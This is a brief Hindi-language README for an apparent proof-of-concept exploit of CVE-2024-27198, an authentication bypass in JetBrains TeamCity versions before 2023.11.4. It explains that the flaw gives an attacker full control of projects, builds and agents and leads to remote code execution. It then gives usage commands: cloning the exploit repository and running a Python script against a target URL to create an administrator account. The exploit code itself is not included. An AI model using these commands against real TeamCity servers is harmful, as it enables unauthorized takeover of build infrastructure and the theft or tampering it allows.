
CVE-2024-27198 के बारे में PoC
JetBrains TeamCity के 2023.11.4 से पहले के संस्करणों में एक प्रमाणीकरण बाईपास है जो TeamCity सर्वर पर व्यवस्थापक क्रियाएं करने की अनुमति देता है, एक हमलावर सभी TeamCity प्रोजेक्ट्स, बिल्ड्स, एजेंट्स और आर्टिफैक्ट्स पर पूर्ण नियंत्रण ले सकता है, अंततः हमलावर RCE (रिमोट कोड एक्जीक्यूशन) करेगा।
git clone https://github.com/jrbH4CK/CVE-2024-27198.git
cd CVE-2024-27198
सर्वर पर व्यवस्थापक विशेषाधिकारों के साथ एक खाता बनाने के लिए
python3 cve-2024-27198.py http://example.com username password

